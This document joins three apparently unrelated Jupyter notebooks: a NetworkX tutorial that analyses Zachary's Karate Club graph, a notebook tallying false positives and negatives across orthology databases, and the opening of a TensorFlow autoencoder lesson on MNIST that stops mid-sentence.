**An edge list** has one row for each edge, containing the origin node and the destination node. 2. **A dictionary** has one key per node, which corresponds to a list of the node's neighbors. 3. **An adjacency matrix** has one entry _per_ possible edge, set to 1 if the edge exists and 0 otherwise. Consider the following example: ``` fig, ax = plt.subplots(1,1, figsize=[4,4]) nx.draw_kamada_kawai(H,node_color='cornflowerblue', node_size=1000, arrows=True, width=3, with_labels=True, font_size=20, ax=ax) ``` Edge list: Dictionary: Adjacency matrix: __________ ___________ _________________ A,B A: B,E A B C D E A,E B: C,D A 0 1 0 0 1 B,C C: D B 0 0 1 1 0 B,D D: A C 0 0 0 1 0 C,D E: D D 1 0 0 0 0 D,A E 0 0 0 1 0 E,D Observe that the storage requirements for each of these data structures is very different. For example, an adjacency matrix has to store lots of zero entries, so in sparse graphs we might prefer to use edge lists or dictionaries. <div class="alert alert-success"> <b>Question:</b> How would the adjacency matrix look different if the graph was weighted? If the graph was undirected? Altogether, we can think of four main pieces of information that we'll need to store: **nodes, edges, node attributes, and edge attributes.** Attribute information could be attached to one of the data structures above, or stored in a separate dataset. - For example, the cells of an adjacency matrix might contain information on weights. - For example, information about nodes (e.g. demographic characteristics) might be kept in a separate table. # Preparing network data with NetworkX Let's start with a simple example using the graph above. This will help us build some intuition on the networkX package. 
We will rely on the following commands: ```python nx.Graph() # Initialize a graph nx.DiGraph() # Initialize a directed graph G.clear() # Clear the graph G.is_empty() # Confirm that the graph is empty G.add_edge() # Add/remove single nodes/edges from graph G.add_node() G.remove_edge() G.remove_nodes() G.add_edges_from([...]) # Add/remove a list of multiple nodes/edges from graph G.add_nodes_from([...]) G.remove_edges_from([...]) G.remove_nodes_from([...]) ``` ## Building a graph from scratch Let's build a simple graph from scratch. For this exercise, let's pretend that we're trying to map which NYU schools allow their students to cross-enroll with another. ### Initializing a graph ``` # Let's create an empty graph G = nx.Graph() # Sadly, there are no nodes or edges, which we can see if we plot: nx.draw(G, with_labels=True) # As we can confirm, it's empty nx.is_empty(G) ``` ### Adding nodes ``` # Add a single node ... G.add_node('Steinhardt') nx.draw(G, with_labels=True) # ... or a list of nodes G.add_nodes_from(['Stern', 'Courant', 'Silver', 'Wagner', 'Tandon']) nx.draw(G, with_labels=True) ``` ### Adding edges ``` # Add a single edge... G.add_edge('Silver', 'Steinhardt') nx.draw(G, with_labels=True) # ... or a list of edges G.add_edges_from([ ('Stern' , 'Courant'), ('Tandon', 'Courant'), ('Wagner', 'Silver'), ('Wagner', 'Steinhardt'), ('Wagner', 'Stern'), ('Wagner', 'Tandon') ]) # Let's see if it worked: nx.draw(G, with_labels=True) ``` ## Building a graph from an edgelist Alternatively, you can just supply a list of edges to the graph ``` H = nx.Graph([ ('Stern' , 'Courant'), ('Tandon', 'Courant'), ('Wagner', 'Silver'), ('Wagner', 'Steinhardt'), ('Wagner', 'Stern'), ('Wagner', 'Tandon'), ('Silver', 'Steinhardt') ]) nx.draw(H, with_labels=True) ``` ## Building special graph types ### Weighted graphs We can specify a weighted graph by including a dictionary with the weight as an attribute. 
``` H.clear() H = nx.Graph([ ('Stern' , 'Courant', {'weight': 5}), ('Tandon', 'Courant', {'weight': 7}), ('Wagner', 'Silver', {'weight': 1}), ('Wagner', 'Steinhardt', {'weight': 2}), ('Wagner', 'Stern', {'weight': 9}), ('Wagner', 'Tandon', {'weight': 3}), ('Silver', 'Steinhardt', {'weight': 6}) ]) nx.draw(H, with_labels=True) H.edges.data() ``` ### Directed graphs We specify a directed graph using `nx.DiGraph` instead of `nx.Graph` ``` H.clear() H = nx.DiGraph([ ('Stern' , 'Courant'), ('Tandon', 'Courant'), ('Wagner', 'Silver'), ('Wagner', 'Steinhardt'), ('Wagner', 'Stern'), ('Wagner', 'Tandon'), ('Silver', 'Steinhardt') ]) nx.draw(H, with_labels=True, arrowsize=25) ``` <div class="alert alert-success"> Can you modify H to reflect the following changes? - Courant now allows its students to enroll in Tandon. - GSAS allows enrollment in Steinhardt, Wagner, and Stern. - Silver no longer wants to participate in any cross-enrolment. **Answer**: <span style="color:white"> H.add_edge('Courant', 'Tandon') H.add_edges_from([('GSAS', 'Steinhardt'),('GSAS', 'Wagner'),('GSAS', 'Stern')]) H.remove_node('Silver') nx.draw(H, with_labels=True, arrowsize=25) </span> ``` H.add_edge('Courant', 'Tandon') H.add_edges_from([('GSAS', 'Steinhardt'),('GSAS', 'Wagner'),('GSAS', 'Stern')]) H.remove_node('Silver') nx.draw(H, with_labels=True, arrowsize=25) ``` ## Importing built-in graphs In the next lesson, we'll learn how to read in graphs from external data sources. For now, perhaps the most interesting way to get a graph is to use built-in graphs! You can find a list of existing graphs, or options for generating certain types of graphs, here: https://networkx.github.io/documentation/stable/reference/generators.html ``` # For example, let's generate a random tree T = nx.random_tree(20) nx.draw(T) # Or, we can import Zachary (1977)'s Karate Club: Z = nx.karate_club_graph() nx.draw(Z) ``` # Analyzing network data Let's stick with Zachary's Karate club and try to learn some more about it. 
Recall the key facts: - This is a network consisting of 34 members of a Karate club, observed for two years (1970-72). - The teacher, Mr. Hi, and the president, John A. had a dispute about fees. - The club split into two factions, which formed new clubs: Mr. Hi's faction, and John's faction (the officers' club). <div class = "alert alert-warning"> <i>Just a quick side note:</i> For replicating the original paper and general ease of use, I have included a quick bit of helper code in the cell below. You don't need to understand it fully right now, but make sure you've run the cell. ``` # Let's shift the keys by 1 to match the original paper. new_keys = {key: key+1 for key in range(0,34)} nx.relabel_nodes(Z, new_keys, copy=False) # Let's set a standard plot layout pos = nx.spring_layout(Z, seed=2, k=.25) ``` ## Inspecting graphs Reference: https://networkx.github.io/documentation/stable/reference/functions.html We'll rely on the following commands: ```python nx.info(G) # Print a quick summary of the graph G.is_directed() # Check if the graph is directed G.number_of_nodes() # Get count of nodes G.number_of_edges() # Get count of edges G.nodes # Get a list of nodes G.edges # Get a list of edges .data() # Get data attached to nodes/edges .items() # Get list of nodes/edges in iterable format nx.get_node_attributes(G, 'attr') # Get a dictionary of nodes and their values of 'attr' ``` ### Graph size ``` nx.draw(Z, with_labels=True, pos=pos) print(nx.info(Z)) # Let's get the graph size another way n_V = Z.number_of_nodes() n_E = Z.number_of_edges() print(f"Our graph has {n_V} nodes and {n_E} edges.") ``` ### Node data ``` # Let's get the nodes Z.nodes() # Let's get any attributes of nodes ... Z.nodes.data() # Great! There is an attribute called club. Let's extract it: nx.get_node_attributes(Z, 'club') ``` ### Edge data ``` # Let's get the edges Z.edges() # Let's get any attributes of edges ... Z.edges.data() # OK. We can see that there are no attributes. 
# Instead, let's ask: Are these edges directed? Z.is_directed() ``` Interesting. We see that we have some labels on which club everyone joined (Mr. Hi's or Officer's), but we are using the unweighted version of the graph. As we expect from the paper, it is undirected. <div class="alert alert-success"> <b> Question: </b> What do the edges represent? When Zachary does provide weights, how does he determine them? ## Local structure Reference: https://networkx.github.io/documentation/stable/reference/functions.html We'll use the following commands: ```python nx.neighbors(G, n) # Get a list of neighbors for node n nx.common_neighbors(G, n1, n2) # Get common neighbors for nodes n1 and n2 nx.non_neighbors(G, n) # Get non-neighbors of node n G.degree(n) # Get n's degree G.degree # Get all degrees for all nodes nx.local_bridges(G, with_span=False) # Get a list of all edges that form local bridges nx.number_connected_components(G) # Get count of connected components list(nx.connected_components(G)) # Get a list of connected components ``` Let's take a second look at the graph and start exploring. ``` nx.draw(Z, with_labels=True, pos=pos) ``` ### Exploring neighbors ``` # Node 17 looks lonely. Let's confirm that (s)he's only friends with 6 and 7 list(nx.neighbors(Z, 17)) # Node 1 is important - it's Mr. Hi himself. Let's see who his neighbors are: list(nx.neighbors(Z, 1)) # Do they share any common neighbors? list(nx.common_neighbors(Z,1,17)) nx.draw(Z, pos=pos, with_labels=True) nx.draw_networkx_nodes(Z, nodelist = [17], node_color='yellow', pos=pos) nx.draw_networkx_nodes(Z, nodelist = [1], node_color='green', pos=pos) nx.draw_networkx_nodes(Z, nodelist = list(nx.common_neighbors(Z,1,17)), node_color='blue', pos=pos) plt.show() # Is there anyone that Mr. Hi is not friends with? sorted(list(nx.non_neighbors(Z, 1))) # Let's visualize. 
Don't worry too much about the code for now nx.draw(Z, pos=pos, with_labels=True, node_color='violet') nx.draw_networkx_nodes(Z, nodelist = [1], node_color='green', pos=pos) nx.draw_networkx_nodes(Z, nodelist = list(nx.neighbors(Z, 1)), node_color='lightgreen', pos=pos) plt.show() ``` ### Exploring degree ``` # How many neighbors does Mr. Hi have after all? Let's get the degree. Z.degree(1) # Actually, we can get the degree of all nodes: Z.degree ``` ### Local bridges ``` # We can even get a list of local bridges. list(nx.local_bridges(Z, with_span=False)) # Recall that a local bridge consists of two nodes who don't share any neighbors # Let's check if they fit the definition: list(nx.common_neighbors(Z,34,20)) # Let's visualize. Don't worry too much about the code for now nx.draw(Z, pos=pos, with_labels=True) nx.draw_networkx_edges(Z, edgelist = list(nx.local_bridges(Z, with_span=False)), edge_color='blue', width=5, pos=pos) plt.show() ``` ### Connected components Reference: https://networkx.github.io/documentation/stable/reference/algorithms/component.html ``` # This graph is kind of un-interesting: there is only one component nx.number_connected_components(Z) # But, we saw that Mr. Hi was a very central node. What happens if he quits Karate altogether? # Let's first copy the graph so we don't overwrite Z Z_without_hi = Z.copy() # Now, remove him Z_without_hi.remove_node(1) # See how many components are left nx.number_connected_components(Z_without_hi) # And, we can see these components -- e.g. 
list(nx.connected_components(Z_without_hi)) for i in nx.connected_components(Z_without_hi): print(i) # We can plot to confirm nx.draw(Z_without_hi, pos=pos, with_labels=True) nx.draw_networkx_nodes(Z_without_hi, pos=pos, nodelist = list(nx.connected_components(Z_without_hi))[0], node_color='yellow') nx.draw_networkx_nodes(Z_without_hi, pos=pos, nodelist = list(nx.connected_components(Z_without_hi))[1], node_color='blue') plt.show() ``` ## Algorithms We'll use the following commands: ```python nx.average_shortest_path_length(G) # Get average length of the shortest path between any two nodes nx.single_source_shortest_path(G, source) # Get the shortest paths from a given source node nx.shortest_path(G, source, sink) # Get the shortest path between a source and a sink node nx.minimum_cut(G, source, sink, capacity='weight') # Partition the graph using the minimum cut ``` ### Shortest path ``` # Let's get the average shortest path length for this club. We can see that there are only 2.4 degrees of separation! nx.average_shortest_path_length(Z) # We could also get the shortest path to all nodes from a given source, e.g. Mr. Hi nx.single_source_shortest_path(Z, 1) # Finally, we could also get the shortest path for a specific origin and destination. # For example how far is Mr. Hi from John? nx.shortest_path(Z, 1, 34) # We can plot to confirm nx.draw(Z, with_labels=True, pos=pos) nx.draw_networkx_nodes(Z, nodelist=[1,32,34], with_labels=True, pos=pos, node_color='yellow') nx.draw_networkx_edges(Z, edgelist=[(1,32), (32,34)], with_labels=True, pos=pos, edge_color='blue', width=10) plt.show() ``` <div class="alert alert-success"> <b> Exercise: </b> - What is the shortest path between John and node 17? - If Mr. Hi leaves, what is the shortest path between John and node 17? 
(don't forget that we already made the graph: Z_without_hi) **Answer:** <span style="color:white"> nx.shortest_path(Z, 17,34) nx.shortest_path(Z_without_hi, 17,34) </span> ``` # We can plot to confirm nx.draw(Z, with_labels=True, pos=pos) nx.draw_networkx_nodes(Z, nodelist=[1,17,7,32,34], with_labels=True, pos=pos, node_color='yellow') nx.draw_networkx_edges(Z, edgelist=[(17,7), (7,1), (1,32), (32,34)], with_labels=True, pos=pos, edge_color='blue', width=10) plt.show() ``` <div class="alert alert-success"> <b> Exercise: </b> - If we add an edge between nodes 17 and 27, how will the average shortest path in the graph change? (Don't forget to copy the graph first). **Answer**: <span style='color:white'> Z_copy = Z.copy() Z_copy.add_edge(17,27) old_average = nx.average_shortest_path_length(Z) new_average = nx.average_shortest_path_length(Z_copy) print(f"The average shortest path decreases from {old_average} to {new_average}.") </span> ``` # We can plot to confirm Z_copy = Z.copy() Z_copy.add_edge(17,27) nx.draw(Z_copy, with_labels=True, pos=pos) nx.draw_networkx_nodes(Z, nodelist=[17,27], with_labels=True, pos=pos, node_color='yellow') nx.draw_networkx_edges(Z_copy, edgelist=[(17,27)], with_labels=True, pos=pos, edge_color='blue', width=10) plt.show() ``` ### Max flow / min cut Zachary uses a simple model of information flow and conflict: - Information flows between two poles in the network: Mr. Hi's, and John's. - Information flows over edges, i.e. interaction between members. - Information flow increases with the strength of these edges, i.e. the number of interactions. - Bottlenecks in information flow represent weak parts of the network. - These bottlenecks can be used to predict how the network will split in the face of conflict. His two main hypotheses are: <div class = "alert-info"> <br> <b>H1</b>: "[There exists] some structural feature in the network inhibiting information flow between factions." 
<b>H2</b>: "A bottleneck in the network, representing a structural limitation on information flow from the source to the sink, will predict the break that occurred in the club at the time of the fission." <br> </div> Computationally, he identifies bottlenecks using the maximum-flow minimum-cut labeling procedure of Ford and Fulkerson. In short, - In a network, we can find the **maximum flow** that can be sustained between a source and a sink node. - It is determined by the graph structure and the capacity of the edges in the graph. - This is equivalent in cost to the **minimum cut** needed to partition the graph into two components (one with the source, the other with the sink). - It is defined as the minimum total weight of edges that can be removed from the graph to partition it. - Ford and Fulkerson provide an algorithm for identifying these edges. - If we switch the source and the sink, repeat the min-cut procedure, and still get the same answer, then our cut is unique. > Per Zachary, "intuitively stated, they proved that the maximum flow is equal to the capacity of the smallest possible break in the network separating the source from the sink." <div class="alert alert-warning"> Brief detour: In order to apply the max flow / min cut algorithm to replicate Zachary, we need edge weights. The code below imports and assigns them to our graph. We'll go over importing data from outside sources in the next section. For now, let's take it on faith that we can read in a weighted edgelist from CSV... ``` # Import edge weights... C = pd.read_csv("data/zachary_edge_weights.csv") # ... and add the edges to our graph for edge in np.array(C): u,v,w= edge Z[u][v]['weight'] = w # Make sure it worked Z.edges.data() ``` #### Find the minimum cut ``` source = 1 # Mr. 
Hi sink = 34 # John A # Let's apply the algorithm to make the minimum cut on the graph cut_value, partition = nx.minimum_cut(Z, source, sink, capacity='weight') # We can inspect the remaining partition of the graph: partition fig, ax = plt.subplots(1,2,figsize=[15,5]) nx.draw(Z, pos=pos, with_labels=True, ax=ax[1]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =list(partition[0]), node_color='blue', ax=ax[1]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =list(partition[1]), node_color='red', ax=ax[1]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =[1,34], node_color='yellow', ax=ax[1]) ax[1].set_title("Factions predicted by algorithm") # Now, let's reconstruct and plot the original mr_hi = [node for node,data in Z.nodes(data=True) if data['club']=='Mr. Hi'] officer = [node for node,data in Z.nodes(data=True) if data['club']=='Officer'] nx.draw(Z, pos=pos, with_labels=True, ax=ax[0]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =mr_hi, node_color='blue', ax=ax[0]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =officer, node_color='red', ax=ax[0]) nx.draw_networkx_nodes(Z,pos=pos, nodelist =[1,34], node_color='yellow', ax=ax[0]) ax[0].set_title("Clubs found in real life") plt.show() ``` We can see that we have replicated Zachary's findings: we have one misprediction, node 9. <img src="figures/zachary_table3.PNG" style="width: 600px;"/> # Exporting NetworkX graphs to other data structures Let's revisit the graph representations from above. Now that we have this nice Karate club graph, we can convert it back into the canonical representations and replicate the adjacency matrix from the paper. 
We'll use the following commands: ```python nx.to_edgelist(Z) # Convert to edge list nx.to_dict_of_lists(Z) # Convert to a dictionary of lists nx.to_pandas_adjacency(Z) # Convert to an adjacency matrix in pandas nx.to_numpy_matrix(Z) # Convert to an adjacency matrix in numpy ``` ## As edgelist ``` # The simplest representation is a basic edgelist list(nx.to_edgelist(Z)) ``` ## As dictionary ``` # We can also convert to a dictionary of lists nx.to_dict_of_lists(Z) ``` ## As adjacency matrix ``` # To adjacency matrix (the add-ons are to make the print output match the paper) nx.to_pandas_adjacency(Z) .astype(int).sort_index().sort_index(axis=1) ``` <img src="figures/zachary_fig3.PNG" style="width: 700px;"/> # Wrap-up ## Plots Let's end with a simple plot to replicate the classic diagram from Zachary: <img src="figures/zachary_fig1.PNG" style="width: 500px;"/> We will cover graphing in the next notebook, but just for fun... ``` # Let's tell networkX we want a circular layout pos = nx.circular_layout(Z) # We need to jump through some hoops to rotate the graph new_pos = {} for k,v in pos.items(): new_pos[ (k+8)%34 +1 ] = v # And there we go! nx.draw(Z, pos=new_pos, with_labels=True) ``` ## Conclusion We have used the Zachary (1977) Karate club data to practice some simple network analysis. We have learned about graph representations, how to read data into `networkX` graphs, and some basic analytic steps like finding connected components and calculating shortest paths. Next, we'll dig into visualizing graphs using a more complex network as an example. Further reading and tutorials: - http://datenstrom.gitlab.io/cs532-s17/notebooks/karate_club.html - https://petterhol.me/2018/01/28/zacharys-zachary-karate-club/ - http://studentwork.prattsi.org/infovis/labs/zacharys-karate-club/ If you **really** enjoyed yourself today, you should aspire to join the [Zachary Karate Club Club](http://networkkarate.tumblr.com/)!
github_jupyter
# False positive and false negatives > This notebook explores the two sources of systematic error that we identify and trim in our datasets. ``` %matplotlib inline from matplotlib import pyplot as plt import pandas as pd import numpy as np ``` ## False positives > False positives are defined as algorithms that, for a given gene, infer an outsized number of losses for that orthogroup. > My programs output mean number of taxa that the algorithms inferred to have had lost the orthogroup, and variance of this number for each gene. > It also identifies algorithms that have an outsize number of taxa (2 standard deviations above the mean). These are listed in the outlier column, if they were found. ``` stats2 = pd.read_csv("lossStats_HUMAN.csv",index_col=0) stats2.fillna({"mean":np.nan,"variance":np.nan,"outliers":0},inplace=True) stats2.head() ``` ### Let's look at distribution of the mean and variance ``` ax = stats2["variance"].hist(bins=50,color='grey') ax.set_title("Variance histogram, all genes") ax.set_ylabel("Number of genes") #plt.savefig("variance_histogram.svg") stats_outliers = stats2[stats2["outliers"] != 0] ax = stats_outliers["variance"].hist(bins=50,color='grey') ax.set_title("Variance, genes with outliers") ax.set_ylabel("Number of genes") ax = stats2["mean"].hist(bins=50,color='grey') ax.set_title("Histogram of mean values, all genes") ax.set_ylabel("Number of genes") #plt.savefig("mean_histogram.svg") ax = stats_outliers["mean"].hist(bins=50,color='grey') ax.set_title("Mean, genes with outliers") ax.set_ylabel("Number of genes") ``` ### Count number of outliers for each gene ``` stats2['numOutliers'] = stats2['outliers'].map(lambda x: len(x.split(" ")) if x != 0 else 0) stats2.head() stats2["numOutliers"].value_counts() ``` ### Get number of false positives (outliers) for each algorithm ``` FalsePos = pd.Series([db for row in stats2["outliers"] for db in str(row).split()]).value_counts() FalsePos = FalsePos[FalsePos.index != '0'] # don't care about 
these FalsePos ``` ## False Negatives > False negatives are defined as oversplitting co-ortholog groups. See the paper for an in-depth description. > My programs output a file that, for each gene, says whether or not each algorithm was found to oversplit. ``` ldos = pd.read_csv("HUMAN_LDO_results.csv",index_col=0) ldos.head() ``` ### Get number of false negatives for each algorithm ``` FalseNeg = ldos.apply(pd.value_counts).loc[True] FalseNeg.sort_values(ascending=False, inplace=True) FalseNeg ``` ### Combine counts of false-negatives and false-positives for each algorithm ``` dbs = ["InParanoid","InParanoidCore","OMA_Groups","OMA_Pairs","PANTHER8_LDO","RSD","EggNOG","Orthoinspector", "Hieranoid_2","EnsemblCompara_v2","Metaphors","PhylomeDB","PANTHER8_all"] errors = pd.DataFrame({"FalsePositive":FalsePos,"FalseNegative":FalseNeg}) errors = errors.reindex(dbs) errors.head() # errors.to_csv("errors_byDatabase.csv") ``` ### Plot counts of errors for each algorithm ``` width = .35 fig, ax1 = plt.subplots() errors["FalseNegative"].plot(kind='bar', ax=ax1, color='grey', width=width, position=1) ax1.set_ylabel("Number Genes False Negative") ax2 = ax1.twinx() errors["FalsePositive"].plot(kind='bar', ax=ax2, color='black', width=width, position=0) ax2.set_ylabel("Number Genes False Positive") ax1.yaxis.grid(False) ax2.yaxis.grid(False) ax1.xaxis.grid(False) ax2.xaxis.grid(False) #plt.savefig("errors_byDatabase.svg") ``` ## Proportional error by database > Normalized error counts by database. ``` normErrors = errors/errors.sum() normErrors["sumErrors"] = normErrors["FalseNegative"] + normErrors["FalsePositive"] normErrors["normSum"] = normErrors["sumErrors"]/normErrors["sumErrors"].sum() normErrors.sum() normErrors["normSum"].plot(kind='bar',color='grey') #plt.savefig("totalErrors.svg") ```
github_jupyter
# Session 3: Unsupervised and Supervised Learning <p class="lead"> Parag K. Mital<br /> <a href="https://www.kadenze.com/courses/creative-applications-of-deep-learning-with-tensorflow/info">Creative Applications of Deep Learning w/ Tensorflow</a><br /> <a href="https://www.kadenze.com/partners/kadenze-academy">Kadenze Academy</a><br /> <a href="https://twitter.com/hashtag/CADL">#CADL</a> </p> <a name="learning-goals"></a> # Learning Goals * Build an autoencoder w/ linear and convolutional layers * Understand how one hot encodings work * Build a classification network w/ linear and convolutional layers <!-- MarkdownTOC autolink=true autoanchor=true bracket=round --> - [Introduction](#introduction) - [Unsupervised vs. Supervised Learning](#unsupervised-vs-supervised-learning) - [Autoencoders](#autoencoders) - [MNIST](#mnist) - [Fully Connected Model](#fully-connected-model) - [Convolutional Autoencoder](#convolutional-autoencoder) - [Denoising Autoencoder](#denoising-autoencoder) - [Variational Autoencoders](#variational-autoencoders) - [Predicting Image Labels](#predicting-image-labels) - [One-Hot Encoding](#one-hot-encoding) - [Using Regression for Classification](#using-regression-for-classification) - [Fully Connected Network](#fully-connected-network) - [Convolutional Networks](#convolutional-networks) - [Saving/Loading Models](#savingloading-models) - [Checkpoint](#checkpoint) - [Protobuf](#protobuf) - [Wrap Up](#wrap-up) - [Reading](#reading) <!-- /MarkdownTOC --> <a name="introduction"></a> # Introduction In the last session we created our first neural network. We saw that in order to create a neural network, we needed to define a cost function which would allow gradient descent to optimize all the parameters in our network <TODO: Insert animation of gradient descent from previous session>. We also saw how neural networks become much more expressive by introducing series of linearities followed by non-linearities, or activation functions. 
<TODO: Insert graphic of activation functions from previous session>. We then explored a fun application of neural networks using regression to learn to paint color values given x, y positions. This allowed us to build up a sort of painterly like version of an image. In this session, we'll see how to use some simple deep nets with about 3 or 4 layers capable of performing unsupervised and supervised learning, and I'll explain those terms in a bit. The components we learn here will let us explore data in some very interesting ways. <a name="unsupervised-vs-supervised-learning"></a> # Unsupervised vs. Supervised Learning Machine learning research in deep networks performs one of two types of learning. You either have a lot of data and you want the computer to reason about it, maybe to encode the data using less data, and just explore what patterns there might be. That's useful for clustering data, reducing the dimensionality of the data, or even for generating new data. That's generally known as unsupervised learning. In the supervised case, you actually know what you want out of your data. You have something like a label or a class that is paired with every single piece of data. In this first half of this session, we'll see how unsupervised learning works using something called an autoencoder and how it can be extended using convolution.. Then we'll get into supervised learning and show how we can build networks for performing regression and classification. By the end of this session, hopefully all of that will make a little more sense. Don't worry if it doesn't yet! Really the best way to learn is to put this stuff into practice in the homeworks. <a name="autoencoders"></a> # Autoencoders <TODO: Graphic of autoencoder network diagram> An autoencoder is a type of neural network that learns to encode its inputs, often using much less data. It does so in a way that it can still output the original input with just the encoded values. 
For it to learn, it does not require "labels" as its output. Instead, it tries to output whatever it was given as input. So in goes an image, and out should also go the same image. But it has to be able to retain all the details of the image, even after possibly reducing the information down to just a few numbers. We'll also explore how this method can be extended and used to cluster or organize a dataset, or to explore latent dimensions of a dataset that explain some interesting ideas. For instance, we'll see how with handwritten numbers, we will be able to see how each number can be encoded in the autoencoder without ever telling it which number is which. <TODO: place teaser of MNIST video learning> But before we get there, we're going to need to develop an understanding of a few more concepts. First, imagine a network that takes as input an image. The network can be composed of either matrix multiplications or convolutions to any number of filters or dimensions. At the end of any processing, the network has to be able to recompose the original image it was input. In the last session, we saw how to build a network capable of taking 2 inputs representing the row and column of an image, and predicting 3 outputs, the red, green, and blue colors. Instead if having 2 inputs, we'll now have an entire image as an input, the brightness of every pixel in our image. And as output, we're going to have the same thing, the entire image being output. 
<a name="mnist"></a> ## MNIST Let's first get some standard imports: ``` # imports %matplotlib inline # %pylab osx import tensorflow as tf import numpy as np import matplotlib.pyplot as plt import matplotlib.colors as colors import matplotlib.cm as cmx # Some additional libraries which we'll use just # to produce some visualizations of our training from libs.utils import montage from libs import gif import IPython.display as ipyd plt.style.use('ggplot') # Bit of formatting because I don't like the default inline code style: from IPython.core.display import HTML HTML("""<style> .rendered_html code { padding: 2px 4px; color: #c7254e; background-color: #f9f2f4; border-radius: 4px; } </style>""") ``` Then we're going to try this with the MNIST dataset, which I've included a simple interface for in the `libs` module. ``` from libs.datasets import MNIST ds = MNIST() ``` Let's take a look at what this returns: ``` # ds.<tab> ``` So we can see that there are a few interesting accessors. ... we're not going to worry about the labels until a bit later when we talk about a different type of model which can go from the input image to predicting which label the image is. But for now, we're going to focus on trying to encode the image and be able to reconstruct the image from our encoding. let's take a look at the images which are stored in the variable `X`. Remember, in this course, we'll always use the variable `X` to denote the input to a network. and we'll use the variable `Y` to denote its output. ``` print(ds.X.shape) ``` So each image has 784 features, and there are 70k of them. If we want to draw the image, we're going to have to reshape it to a square. 28 x 28 is 784. So we're just going to reshape it to a square so that we can see all the pixels arranged in rows and columns instead of one giant vector. 
``` plt.imshow(ds.X[0].reshape((28, 28))) # Let's get the first 1000 images of the dataset and reshape them imgs = ds.X[:1000].reshape((-1, 28, 28)) # Then create a montage and draw the montage plt.imshow(montage(imgs), cmap='gray') ``` Let's take a look at the mean of the dataset: ``` # Take the mean across all images mean_img = np.mean(ds.X, axis=0) # Then plot the mean image. plt.figure() plt.imshow(mean_img.reshape((28, 28)), cmap='gray') ``` And the standard deviation ``` # Take the std across all images std_img = np.std(ds.X, axis=0) # Then plot the std image. plt.figure() plt.imshow(std_img.reshape((28, 28))) ``` So recall from session 1 that these two images are really saying whats more or less contant across every image, and what's changing. We're going to try and use an autoencoder to try to encode everything that could possibly change in the image. <a name="fully-connected-model"></a> ## Fully Connected Model To try and encode our dataset, we are going to build a series of fully connected layers that get progressively smaller. So in neural net speak, every pixel is going to become its own input neuron. And from the original 784 neurons, we're going to slowly reduce that information down to smaller and smaller numbers. It's often standard practice to use other powers of 2 or 10. I'll create a list of the number of dimensions we'll use for each new layer. ``` dimensions = [512, 256, 128, 64] ``` So we're going to reduce our 784 dimensions down to 512 by multiplyling them by a 784 x 512 dimensional matrix. Then we'll do the same thing again using a 512 x 256 dimensional matrix, to reduce our dimensions down to 256 dimensions, and then again to 128 dimensions, then finally to 64. To get back to the size of the image, we're going to just going to do the reverse. But we're going to use the exact same matrices. We do that by taking the transpose of the matrix, which reshapes the matrix so that the rows become columns, and vice-versa. 
So our last matrix which was 128 rows x 64 columns, when transposed, becomes 64 rows x 128 columns. So by sharing the weights in the network, we're only really learning half of the network, and those 4 matrices are going to make up the bulk of our model. We just have to find out what they are using gradient descent. We're first going to create `placeholders` for our tensorflow graph. We're going to set the first dimension to `None`. This is something special for placeholders which tells tensorflow "let this dimension be any possible value". 1, 5, 100, 1000, it doesn't matter. We're going to pass our entire dataset in minibatches. So we'll send 100 images at a time. But we'd also like to be able to send in only 1 image and see what the prediction of the network is. That's why we let this dimension be flexible in the graph. ``` # So the number of features is the second dimension of our inputs matrix, 784 n_features = ds.X.shape[1] # And we'll create a placeholder in the tensorflow graph that will be able to get any number of n_feature inputs. X = tf.placeholder(tf.float32, [None, n_features]) ``` Now we're going to create a network which will perform a series of multiplications on `X`, followed by adding a bias, and then wrapping all of this in a non-linearity: ``` # let's first copy our X placeholder to the name current_input current_input = X n_input = n_features # We're going to keep every matrix we create so let's create a list to hold them all Ws = [] # We'll create a for loop to create each layer: for layer_i, n_output in enumerate(dimensions): # just like in the last session, # we'll use a variable scope to help encapsulate our variables # This will simply prefix all the variables made in this scope # with the name we give it. 
with tf.variable_scope("encoder/layer/{}".format(layer_i)): # Create a weight matrix which will increasingly reduce # down the amount of information in the input by performing # a matrix multiplication W = tf.get_variable( name='W', shape=[n_input, n_output], initializer=tf.random_normal_initializer(mean=0.0, stddev=0.02)) # Now we'll multiply our input by our newly created W matrix # and add the bias h = tf.matmul(current_input, W) # And then use a relu activation function on its output current_input = tf.nn.relu(h) # Finally we'll store the weight matrix so we can build the decoder. Ws.append(W) # We'll also replace n_input with the current n_output, so that on the # next iteration, our new number inputs will be correct. n_input = n_output ``` So now we've created a series of multiplications in our graph which take us from our input of batch size times number of features which started as `None` x `784`, and then we're multiplying it by a series of matrices which will change the size down to `None` x `64`. ``` print(current_input.get_shape()) ``` In order to get back to the original dimensions of the image, we're going to reverse everything we just did. Let's see how we do that: ``` # We'll first reverse the order of our weight matrices Ws = Ws[::-1] # then reverse the order of our dimensions # appending the last layers number of inputs. dimensions = dimensions[::-1][1:] + [ds.X.shape[1]] print(dimensions) for layer_i, n_output in enumerate(dimensions): # we'll use a variable scope again to help encapsulate our variables # This will simply prefix all the variables made in this scope # with the name we give it. 
with tf.variable_scope("decoder/layer/{}".format(layer_i)): # Now we'll grab the weight matrix we created before and transpose it # So a 3072 x 784 matrix would become 784 x 3072 # or a 256 x 64 matrix, would become 64 x 256 W = tf.transpose(Ws[layer_i]) # Now we'll multiply our input by our transposed W matrix h = tf.matmul(current_input, W) # And then use a relu activation function on its output current_input = tf.nn.relu(h) # We'll also replace n_input with the current n_output, so that on the # next iteration, our new number inputs will be correct. n_input = n_output ``` After this, our `current_input` will become the output of the network: ``` Y = current_input ``` Now that we have the output of the network, we just need to define a training signal to train the network with. To do that, we create a cost function which will measure how well the network is doing: ``` # We'll first measure the average difference across every pixel cost = tf.reduce_mean(tf.squared_difference(X, Y), 1) print(cost.get_shape()) ``` And then take the mean again across batches: ``` cost = tf.reduce_mean(cost) ``` We can now train our network just like we did in the last session. We'll need to create an optimizer which takes a parameter `learning_rate`. And we tell it that we want to minimize our cost, which is measuring the difference between the output of the network and the input. ``` learning_rate = 0.001 optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost) ``` Now we'll create a session to manage the training in minibatches: ``` # %% # We create a session to use the graph sess = tf.Session() sess.run(tf.initialize_all_variables()) ``` Now we'll train: ``` # Some parameters for training batch_size = 100 n_epochs = 5 # We'll try to reconstruct the same first 100 images and show how # The network does 